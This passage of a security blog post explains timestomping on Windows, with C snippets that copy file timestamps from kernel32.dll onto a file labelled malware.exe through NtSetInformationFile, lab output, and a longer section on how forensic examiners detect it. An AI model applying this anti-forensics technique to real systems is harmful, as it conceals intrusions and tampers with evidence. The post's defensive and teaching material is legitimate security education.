                        &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;FILE_BASIC_INFORMATION&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="n"&gt;FileBasicInformation&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="c1"&gt;// Replace timestamps&lt;/span&gt;
&lt;span class="n"&gt;dst_fbi&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;LastWriteTime&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;src_fbi&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;LastWriteTime&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="n"&gt;dst_fbi&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;LastAccessTime&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;src_fbi&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;LastAccessTime&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="n"&gt;dst_fbi&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ChangeTime&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;src_fbi&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ChangeTime&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="n"&gt;dst_fbi&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;CreationTime&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;src_fbi&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;CreationTime&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Step 6: Write Modified Metadata Back
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="n"&gt;pNtSetInformationFile&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;fileDst&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;                          &lt;span class="c1"&gt;// File handle&lt;/span&gt;
    &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;ioStat&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;                          &lt;span class="c1"&gt;// Status block&lt;/span&gt;
    &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;dst_fbi&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;                         &lt;span class="c1"&gt;// Modified structure&lt;/span&gt;
    &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;FILE_BASIC_INFORMATION&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;   &lt;span class="c1"&gt;// Buffer size&lt;/span&gt;
    &lt;span class="n"&gt;FileBasicInformation&lt;/span&gt;              &lt;span class="c1"&gt;// Information class&lt;/span&gt;
&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  🎬 How It Works (Flow)
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;┌─────────────────────────────────────────────────┐
│ SOURCE FILE                DESTINATION FILE     │
│ (kernel32.dll)             (malware.exe)        │
└─────────────┬──────────────────────┬────────────┘
              │                      │
              ↓                      ↓
        ┌──────────────┐      ┌──────────────┐
        │ Query        │      │ Query        │
        │ Timestamps   │      │ Timestamps   │
        └──────┬───────┘      └──────┬───────┘
               │                     │
               ↓                     ↓
        ┌──────────────┐      ┌──────────────┐
        │ CreationTime │      │ CreationTime │
        │ LastAccess   │      │ LastAccess   │
        │ LastWrite    │      │ LastWrite    │
        └──────┬───────┘      └──────┬───────┘
               │                     │
               └─────────┬───────────┘
                         ↓
                   COPY TIMESTAMPS
                         ↓
                  ┌──────────────┐
                  │ SetFileInfo  │
                  │ Write Back   │
                  └──────┬───────┘
                         ↓
                    ✅ SUCCESS
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  📊 Real-World Lab Results
&lt;/h2&gt;

&lt;p&gt;I tested this on Windows 10/11. Here's what happens:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Before Timestomping:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="gp"&gt;C:\&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nb"&gt;dir&lt;/span&gt; /tc test.txt
&lt;span class="go"&gt;07/10/2026 10:13 PM

&lt;/span&gt;&lt;span class="gp"&gt;C:\&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nb"&gt;dir&lt;/span&gt; /tw test.txt
&lt;span class="go"&gt;07/10/2026 10:15 PM
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;After timestomping (using kernel32.dll as source):&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="gp"&gt;C:\&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nb"&gt;dir&lt;/span&gt; /tc test.txt
&lt;span class="go"&gt;04/30/2026 10:30 PM

&lt;/span&gt;&lt;span class="gp"&gt;C:\&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nb"&gt;dir&lt;/span&gt; /tw test.txt
&lt;span class="go"&gt;04/30/2026 10:30 PM
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The file now appears to have been created and modified in April—months ago—even though we modified it today.&lt;/p&gt;




&lt;h2&gt;
  
  
  🚨 Why Timestomping Alone Doesn't Work
&lt;/h2&gt;

&lt;p&gt;Here's the critical part: &lt;strong&gt;timestomping is easily detected by forensic examiners.&lt;/strong&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Why Timestamps Can't Be Trusted Alone
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Creation Time &amp;lt; Last Write Time&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;If a file's creation time is &lt;em&gt;after&lt;/em&gt; its last write time, something is wrong&lt;/li&gt;
&lt;li&gt;Legitimate behavior: Creation ≤ Last Write (always)&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;The NTFS USN Journal&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;NTFS maintains a &lt;strong&gt;Change Journal&lt;/strong&gt; recording all file modifications&lt;/li&gt;
&lt;li&gt;This journal is harder to modify than file timestamps&lt;/li&gt;
&lt;li&gt;Forensic examiners cross-reference timestamps with USN entries&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Event Logs&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Windows logs application behavior in &lt;code&gt;Event Viewer&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;A process execution is recorded regardless of file timestamps&lt;/li&gt;
&lt;li&gt;Malware execution can be tied to specific processes&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Link Files &amp;amp; Prefetch&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Windows creates &lt;code&gt;.lnk&lt;/code&gt; files with accurate timestamps&lt;/li&gt;
&lt;li&gt;Prefetch files (&lt;code&gt;C:\Windows\Prefetch\&lt;/code&gt;) log application execution&lt;/li&gt;
&lt;li&gt;These are harder to modify than file times&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;MFT Analysis&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The Master File Table stores multiple timestamp variations&lt;/li&gt;
&lt;li&gt;Some entries are resistant to modification&lt;/li&gt;
&lt;li&gt;Examiners compare MFT entries with user-visible timestamps&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  How Forensic Examiners Detect Timestomping
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Timeline:
├── File timestamps: April 30
├── USN Journal: July 10 ✅ MISMATCH
├── Windows Event Log: July 10 ✅ MISMATCH
├── Prefetch: July 10 ✅ MISMATCH
└── MFT Record: July 10 ✅ MISMATCH

CONCLUSION: Timestamps are forged
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  🛡️ Forensic Recommendations
&lt;/h2&gt;

&lt;p&gt;If you're on the &lt;strong&gt;defense side&lt;/strong&gt;, here's how to strengthen your detection:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Collect Multiple Data Sources&lt;/strong&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;   ✅ File timestamps
   ✅ USN Journal
   ✅ Windows Event Logs
   ✅ Prefetch files
   ✅ Link files
   ✅ MFT analysis
   ✅ Application logs
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Monitor File Modifications&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Use File Integrity Monitoring (FIM) tools&lt;/li&gt;
&lt;li&gt;Alert on suspicious timestamp changes&lt;/li&gt;
&lt;li&gt;Correlate with process execution logs&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Hardening&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Implement filesystem auditing&lt;/li&gt;
&lt;li&gt;Enable USN Journal on critical partitions&lt;/li&gt;
&lt;li&gt;Use WDAC (Windows Defender Application Control) to restrict executable creation&lt;/li&gt;
&lt;li&gt;Monitor &lt;code&gt;ntdll.dll&lt;/code&gt; function calls (suspicious if processes call &lt;code&gt;NtSetInformationFile&lt;/code&gt;)&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;




&lt;h2&gt;
  
  
  🎓 Technical Concepts You'll Learn
&lt;/h2&gt;

&lt;p&gt;By studying this code, you'll understand:&lt;/p&gt;

&lt;p&gt;✅ &lt;strong&gt;Windows Internals&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;NTFS file system structures&lt;/li&gt;
&lt;li&gt;Master File Table (MFT)&lt;/li&gt;
&lt;li&gt;File timestamps and their representations&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;✅ &lt;strong&gt;Native APIs&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;How Win32 abstracts the kernel&lt;/li&gt;
&lt;li&gt;Undocumented API usage&lt;/li&gt;
&lt;li&gt;Dynamic API resolution&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;✅ &lt;strong&gt;Forensics &amp;amp; Incident Response&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Timeline reconstruction&lt;/li&gt;
&lt;li&gt;Artifact correlation&lt;/li&gt;
&lt;li&gt;Evidence integrity checks&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;✅ &lt;strong&gt;Malware Analysis&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Common evasion techniques&lt;/li&gt;
&lt;li&gt;Timestamp manipulation detection&lt;/li&gt;
&lt;li&gt;Attribution challenges&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  🔗 Resources &amp;amp; Further Reading
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Windows Internals:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://docs.microsoft.com/en-us/sysinternals/resources/windows-internals" rel="noopener noreferrer"&gt;Windows Internals Part 1 &amp;amp; 2&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://undocumented.ntinternals.net/" rel="noopener noreferrer"&gt;Undocumented Windows NT API Reference&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Forensics:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.sans.org/white-papers/" rel="noopener noreferrer"&gt;SANS: File System Forensics&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.eccouncil.org/" rel="noopener noreferrer"&gt;EnCase Certification Handbook&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;NTFS Deep Dive:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://docs.microsoft.com/en-us/windows/win32/fileio/file-systems" rel="noopener noreferrer"&gt;NTFS Documentation - Microsoft Docs&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://en.wikipedia.org/wiki/Master_file_table" rel="noopener noreferrer"&gt;NTFS $MFT Analysis&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Malware Analysis:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://owasp.org/" rel="noopener noreferrer"&gt;OWASP: Malware Analysis&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://blog.virustotal.com/" rel="noopener noreferrer"&gt;VirusTotal Intelligence Blog&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  📦 Full Repository
&lt;/h2&gt;

&lt;p&gt;Check out the complete working code:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;GitHub:&lt;/strong&gt; &lt;a href="https://github.com/zainsial866/timestomper" rel="noopener noreferrer"&gt;zainsial866/timestomper&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What's included:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;✅ Complete C source code&lt;/li&gt;
&lt;li&gt;✅ Detailed README with examples&lt;/li&gt;
&lt;li&gt;✅ Lab notes documenting behavior&lt;/li&gt;
&lt;li&gt;✅ Header files with structure definitions&lt;/li&gt;
&lt;li&gt;✅ Compilation instructions&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  ⚖️ Legal &amp;amp; Ethical Note
&lt;/h2&gt;

&lt;p&gt;This tool is for &lt;strong&gt;educational purposes and authorized security research only&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Modifying file timestamps without authorization may violate:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;🛑 Computer Fraud &amp;amp; Abuse Act (CFAA)&lt;/li&gt;
&lt;li&gt;📜 Evidence tampering laws&lt;/li&gt;
&lt;li&gt;🔒 Your organization's security policy&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Always get explicit authorization before testing on any system.&lt;/strong&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  🎯 Conclusion
&lt;/h2&gt;

&lt;p&gt;Timestomping is a powerful technique that demonstrates:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;How easily file metadata can be modified&lt;/li&gt;
&lt;li&gt;Why forensic investigators use multiple data sources&lt;/li&gt;
&lt;li&gt;The importance of understanding Windows internals&lt;/li&gt;
&lt;li&gt;How attackers hide their footprints&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;But it's also a reminder that &lt;strong&gt;no single artifact tells the whole story&lt;/strong&gt;. Modern incident response requires correlation across logs, events, and file system metadata.&lt;/p&gt;

&lt;p&gt;If you're building a SOC, hunting for threats, or just curious about Windows internals—understanding timestomping is critical.&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;Have thoughts on forensics, Windows internals, or cybersecurity?&lt;/strong&gt; Drop a comment below. 👇&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Want to see more deep dives like this?&lt;/strong&gt; Follow for more technical content on offensive security, Windows research, and malware analysis.&lt;/p&gt;




&lt;h3&gt;
  
  
  About the Author
&lt;/h3&gt;

&lt;p&gt;I'm a cybersecurity student at SS-CASE-IT focusing on offensive security, Windows internals, and tool development. I post technical content on &lt;a href="https://github.com/zainsial866" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt; and maintain a blog covering CTF writeups, security research, and system internals.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Connect with me:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;🐙 &lt;a href="https://github.com/zainsial866" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;🔗 &lt;a href="//linkedin.com/in/muhammad-zain-ul-abdin-1b4073375/"&gt;LinkedIn&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;em&gt;Last updated: July 2026&lt;/em&gt;&lt;/p&gt;

</description>
      <category>windows</category>
      <category>cybersecurity</category>
      <category>forensics</category>
      <category>nativeapi</category>
    </item>
  </channel>
</rss>
